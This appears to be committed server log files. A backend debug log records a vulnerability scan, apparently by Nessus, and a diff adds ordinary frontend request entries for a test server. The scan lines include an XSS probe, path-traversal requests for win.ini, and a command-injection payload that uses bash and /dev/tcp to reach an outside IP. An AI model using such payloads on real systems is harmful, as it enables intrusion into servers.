GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.802Z debug: [1667346042801, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.807Z debug: [1667346042806, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.808Z debug: [1667346042807, duration: 1] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.813Z debug: [1667346042812, duration: 1] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.814Z debug: [1667346042813, duration: 0] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.819Z debug: [1667346042818, duration: 1] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.820Z debug: [1667346042819, duration: 0] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.825Z debug: [1667346042824, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.826Z debug: [1667346042826, duration: 0] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.831Z debug: [1667346042831, duration: 0] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.832Z debug: [1667346042832, duration: 0] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.837Z debug: [1667346042837, duration: 0] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.841Z debug: [1667346042840, duration: 0] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.843Z debug: [1667346042843, duration: 0] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.847Z debug: [1667346042847, duration: 0] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.850Z debug: [1667346042849, duration: 0] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.855Z debug: [1667346042854, duration: 1] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.856Z debug: [1667346042855, duration: 1] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.860Z debug: [1667346042860, duration: 0] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.862Z debug: [1667346042861, duration: 1] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.866Z debug: [1667346042865, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.871Z debug: [1667346042870, duration: 1] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.878Z debug: [1667346042877, duration: 1] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.885Z debug: [1667346042884, duration: 1] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.891Z debug: [1667346042890, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.145Z debug: [1667346043143, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.151Z debug: [1667346043150, duration: 1] POST:/api/cgi-bin/file_transfer.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.184Z debug: [1667346043183, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.194Z debug: [1667346043193, duration: 1] GET:/api/logon?onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.195Z debug: [1667346043193, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.201Z debug: [1667346043201, duration: 0] GET:/api/error_page.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.221Z debug: [1667346043220, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.227Z debug: [1667346043227, duration: 0] GET:/api/default.asp%20, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.229Z debug: [1667346043228, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.235Z debug: [1667346043234, duration: 1] GET:/api/default.asp., reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.249Z debug: [1667346043248, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.256Z debug: [1667346043255, duration: 0] GET:/api/default.asp::$DATA, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.261Z debug: [1667346043259, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.267Z debug: [1667346043266, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.290Z debug: [1667346043289, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.295Z debug: [1667346043295, duration: 0] GET:/api/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.296Z debug: [1667346043296, duration: 0] GET:/api/note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.302Z debug: [1667346043301, duration: 0] GET:/api/note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.320Z debug: [1667346043320, duration: 0] GET:/api/trace.axd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.332Z debug: [1667346043332, duration: 0] GET:/api/global.asa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:43.336Z debug: [1667346043335, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.353Z debug: [1667346043348, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:43.359Z debug: [1667346043358, duration: 0] GET:/api/user_settings.cfg, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:47.029Z debug: [1667346047028, duration: 1] GET:/api/api/getServices?name[]=$(bash%20-c%20%22echo%20exploited_PORT[442]by_nessus%20%3E/dev/tcp/172.20.22.21/44445"), reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:57.209Z debug: [1667346057207, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:57.215Z debug: [1667346057215, duration: 0] GET:/api/rails_info/properties, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:57.247Z debug: [1667346057245, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:57.252Z debug: [1667346057252, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 diff --git a/backend/logs/front.log b/backend/logs/front.log index 43239a964..fe24269bb 100644 --- a/backend/logs/front.log +++ b/backend/logs/front.log @@ -869,3 +869,1279 @@ sended request[{"Time":1666853543062,"reqMethod":"GET","reqURL":"http://localhos sended request[{"Time":1666853544323,"reqMethod":"GET","reqURL":"http://localhost:8080/api/mongo/report/635a2aa84efa73278c610061"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] sended request[{"Time":1666853818976,"reqMethod":"GET","reqURL":"http://localhost:8080/api/run/saveReport/635a2aa84efa73278c610061"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] sended request[{"Time":1666853878046,"reqMethod":"GET","reqURL":"http://localhost:8080/api/user/logout"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150501413,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150519624,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150520917,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150520978,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/6238538930768bfa183c93ad"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150520997,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150521107,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150521108,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/6238538930768bfa183c93ad"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150521109,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536584,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536618,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536601,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536669,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536671,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536677,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536672,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536678,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150536679,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150538733,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150538747,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150583907,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150583911,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/user/"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150585736,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150585743,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150585772,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150585773,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150585774,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150593203,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150593216,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150616043,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/logout"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150833822,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850687,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850839,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850891,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850909,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850952,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850953,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150850954,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150852052,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150852061,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150869712,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150878820,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150888877,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/logout"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150893758,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895662,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895804,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895853,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895876,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895933,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895939,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150895936,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150971786,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/logout"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150972946,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973092,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973138,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973152,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973193,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973195,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150973197,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150982461,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667150982507,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/60d0c175204b292bec9cf594"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196181398,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196210392,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196210535,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219080,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/login"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219221,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219266,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219301,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219353,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219355,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196219357,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196229387,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196229410,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196247028,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/Feature/6357a1e942797f1390c87c71/db"},{"normalizedNames":{},"lazyUpdate":null,"lazyInit":null,"headers":{}}] +sended request[{"Time":1667196918566,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a1e942797f1390c87c71"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196926081,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667196926114,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/report/reporting_1666976408261"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064177,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064230,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/repositories"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064232,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064308,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064310,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197064311,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197065778,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197065793,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197086544,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a1e942797f1390c87c71/db/5"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667197092002,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a1e942797f1390c87c71/db/4"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927324,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927347,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927369,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927420,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927423,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927426,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927433,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/user/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927434,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/group/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198927435,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/stepTypes"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198930115,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198930130,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198932819,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198940413,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/background/update/6357a20842797f1390c87c74/db"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667198943930,"reqMethod":"POST","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/Scenario/6357a20842797f1390c87c74/db/2"},{"normalizedNames":{},"lazyUpdate":null,"lazyInit":null,"headers":{}}] +sended request[{"Time":1667198966933,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/report/635f6ff4fa76542960ac1244"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199070928,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/3"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199074060,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/3"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199091404,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/3"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199224598,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/3"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199233629,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/4"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199237022,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/5"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667199256549,"reqMethod":"PUT","reqURL":"https://ad-daisy-seed01.test-server.ag:442/story/6357a20842797f1390c87c74/db/4"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended 